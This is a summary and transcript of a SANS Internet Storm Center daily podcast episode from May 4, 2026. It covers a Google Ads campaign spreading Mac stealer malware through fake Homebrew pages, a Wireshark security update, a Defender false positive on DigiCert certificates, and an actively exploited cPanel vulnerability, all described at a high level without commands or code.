Summary4 min read

SANS Stormcast Summary: May 4, 2026

Host: Johannes B. Ullrich
Podcast: SANS Internet Stormcenter Daily Cyber Security Podcast

Episode Overview

In this quick, information-dense episode, Johannes B. Ullrich delivers a rundown of the latest cybersecurity developments relevant to both security practitioners and sysadmins. The episode touches on multiple breaking issues, including a sophisticated Mac malware threat distributed through Google Ads, a critical Wireshark update, a false positive incident involving DigiCert certificates, and an actively exploited cPanel vulnerability.

Key Discussion Points & Insights

1. Malicious Homebrew Ads & Mac Stealer Attack

[00:20] – [02:05]

Attack Vector:
- Malicious actors are deploying paid Google Ads targeting users searching for “Homebrew” (a widely used Mac package manager).
- The links route to a business.google.com page—which is usually not flagged as malicious—and then redirect to a fake Homebrew site hosted on sites.google.com.
Execution Mechanism:
- The fake page mimics the real Homebrew download experience, urging users to copy and paste a shell script into Terminal.
- Unlike the genuine Homebrew installation script, the malicious one is obfuscated (base64 encoded), which then downloads further malware, including Mac Sync Stealer.
Detection & Risks:
- The script is not well detected by antivirus or endpoint protection tools and may evade Apple’s recent “click fix” safeguards.
- Because legitimate tools and compromised reputable sites are used in delivery, users may not recognize the threat.
- “If you're routinely copy-pasting into the terminal then this may not trigger...” (Johannes, [01:37])
Resources:
- Full malware analysis, packet captures, and links to related IOCs are provided by Brad on the SANS Internet Storm Center diaries.

2. Wireshark 4.6.5 Security Update

[02:06] – [03:07]

What's New:
- Release 4.6.5 addresses 43 vulnerabilities—some exploitable for code execution—recently discovered using AI-powered tools by Wireshark’s team.
- Includes a modified startup page, now featuring a prominent SharkFest ad and a donation button.
Personal Note:
- “I've been using Wireshark probably just sort of since it came out like in the late 90s... wasn't even aware that they were looking for donations. And it's such a useful tool, so if you're using it regularly, well, give them a little bit money to support the development.” (Johannes, [03:01])
Recommendation:
- Urgent update recommended to avoid exploit risk.

3. DigiCert Certificate False Positive in Microsoft Defender

[03:08] – [04:07]

Incident Recap:
- Microsoft Defender for Endpoint incorrectly flagged certain DigiCert CA certificates as malicious and removed them from affected systems.
- These DigiCert certificates are pre-installed root certificates.
Background & Details:
- The flagging was a false positive, but triggered by a real concern: DigiCert suffered a malware compromise internally.
- Attackers issued 60 malicious certificates, which DigiCert then revoked.
- Defender mistakenly marked the CA certificate—not just the malicious issued ones—as bad.
Security Takeaway:
- The bug report filed in Microsoft’s CA program is notable for transparency, and the incident highlights both the challenge of protecting certificate infrastructure and the role of endpoint defenses.
Quote:
- “There is a little bit more to the story that I just want to point out... DigiCert did file a bug report... there was actually a compromise of DigiCert. Some systems within DigiCert got compromised by malware and 60 different certificates were issued by the malicious actor and subsequently then revoked.” (Johannes, [03:34])

4. Actively Exploited cPanel Vulnerability

[04:08] – [05:05]

Vulnerability Status:
- cPanel is currently under attack via a widely exploited vulnerability; patches have been published.
- Auto-update is available, but admins are urged to verify patch status.
Risks:
- cPanel’s use in virtual hosting means one instance may control many sites—compromise risks are multiplied.
- “... it's one of those cases where you want to assume compromise if you have cPanel exposed.” (Johannes, [04:45])
Action Required:
- Refer to cPanel.net for patch information. Double-check that auto-update has applied the fix, especially if your cPanel instance is internet-facing.
Quote:
- “A particular cPanel instance may have a large number of different websites behind and they are now all exposed due to this vulnerability.” (Johannes, [05:00])

Memorable Moments & Quotes

On Stealthy Mac Malware:
- “The only URL you’re seeing here is business.google.com, which of course is often not considered malicious.” ([00:41])
Wireshark’s Ongoing Value:
- “It's such a useful tool, so if you're using it regularly, well, give them a little bit money to support the development.” ([03:01])
On cPanel Exposure:
- “Assume compromise if you have cPanel exposed.” ([04:45])

Timestamps for Key Segments

[00:20] Malicious Mac Homebrew Ads & Infection Chain
[02:06] Wireshark 4.6.5 Security Update Details
[03:08] DigiCert Compromise and Defender False Positive
[04:08] cPanel Active Exploit & Patch Urgency
[05:05+] Episode wrap-up and sign-off

Final Notes

This episode underscores the need for continual vigilance in the face of evolving threats—from stealthy ad-driven Mac malware to supply chain risks in certificate authorities and mass-targeted panel vulnerabilities. Johannes’ experienced yet practical tone offers both technical detail and actionable advice for frontline defenders.

Loading summary

Transcript1 lines

[00:05]
A
Hello and welcome to the Monday, May 4, 2026 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ulrich, recording today from Jacksonville, Florida and this episode is brought to you by the SANS Edu Graduate Certificate Program in Industrial Control Systems Security. And in diaries today we got one of the excellent malware analysis diaries from Brad. Brad walks us here. An infection with Mac Sync Stealer. Now what makes this particular attack so successful likely is that, well it takes full advantage of the entire Google ecosystem. It starts out with a paid ad on Google. If you're searching for homebrew, you may be seeing links for this particular malicious version of Homebrew, which is then also hosted within Google's Pages infrastructure. So the only URL URL you're seeing here is business.google.com, which of course is often not considered malicious. Now if the user then clicks on this link, they're then being sent to a fake homebrew page. Now if you're not familiar with HomePrew, HomePro is essentially a system that allows you to easily install various open source tools. So it's very commonly used by Mac users. And the page here looks very much like the real thing, only that this one of course is hosted within sites.google.com now just like in the real Home Pro, you're then being asked to sort of copy paste shell script in order to execute the installer. Now the real version is not obfuscated like the one here. Here you're then basically pasting a base 64 encoded string that then leads to execution and will then download additional tools including the malware in the end. Now there are of different warnings that you are probably getting. So definitely something that's not low friction really. But then again it's still fairly easy for a victim to overlook this and go through with the install of this maxim stealer as often Barat has released all the packet captures and of course links to various tools and such that are being downloaded here on VirusTotal. The initial script is not well detected. It may get detected by this sort of new click fix fix that Apple has implemented. But of course that depends on how you're using your system. If you're routinely copy pasting into the terminal then this may not trigger here since these tools are in particular for users that often use the terminal and such is probably not going to get detected here on many system. And then of course many of the malware pieces that are being downloaded here are hosted on well legitimate websites that are just compromised. Well and then we have a new version of Wireshark 4.6.5. I usually don't sort of highlight new releases of Wireshark. They often do fix vulnerabilities. What's different about this release? Well, actually two things are sort of different here. Number one, that this particular version does include fixes for vulnerabilities discovered recently by AI tools the developers used. So we have a total of 43 different vulnerabilities being addressed here. Some of these vulnerabilities may be exploitable for code execution, so definitely something that you want to take care of. Now I usually don't like it when products release out of a big security update like this and then they also make some changes sort of to the ui. In this particular case, I sort of actually understand that they changed the startup page a little bit and added sort of a more prominent ad for sharkfest, which is sort of a conference that the wireshark people are running, and also a donation button. And I have to admit I've been using wireshark probably just sort of since it came out like in the late 90s, definitely when it was still called Etherreal back in the day and wasn't even aware that they were looking for donations. And it's such a useful tool, so if you're using it regularly, well give them a little bit money to support the development. And this weekend there were multiple reports that Microsoft Defender for Endpoint did mark certain certificate authority certificates from DigiCert as malicious and removed them in some cases from systems. So these were pre installed certificate authority certificates and this was quickly dismissed sort of as false positive, which it was. But there is a little bit more to the story that I just want to point out. So in this particular case, DigiCert did file a bug report with the certified authority program. Now a bug report here is really just meant sort of to communicate any issues with the certified authority program. It's not necessarily sort of a classic bug. In this case it was actually a compromise of DigiCert. Some systems within DigiCert got compromised by malware and 60 different certificates were issued by the malicious actor and subsequently then revoked. All of these certificates were signed by these certificate authority certificates that are now being here marked as malicious. It's likely more sort of a mistake here on Microsoft's and that they marked these sort of authority certificates as malicious, not the individual certificates. Again, the revocation, if it worked, should have taken care of these 60 certificates by now, hopefully. Anyway, even though the latest update here was just a couple days ago, actually a pretty good bug report because an interesting compromise here in that some of the endpoint defenses that DigiCert here had in place had failed and for anybody running cPanel to manage their servers be aware there is an already widely exported exploited vulnerability going around here. Compromising cPanel patches have been released so please refer to the cpanel.net page for any details regarding the patch. CPanel as far as I know has an auto update feature that should protect you here, but please double check since yes the exploit is widely available so definitely it's one of those cases where you want to assume compromise if you have cPanel exposed. CPanel is particular sort of problematic because it's often used by virtual hosting companies and such to provide customers access to servers. So a particular cPanel instance may have a large number of different websites behind and they are now all exposed due to this vulnerability. Well and this is it for today, so thanks for listening, thanks for liking, thanks for subscribing and as always talk to you again tomorrow. Bye.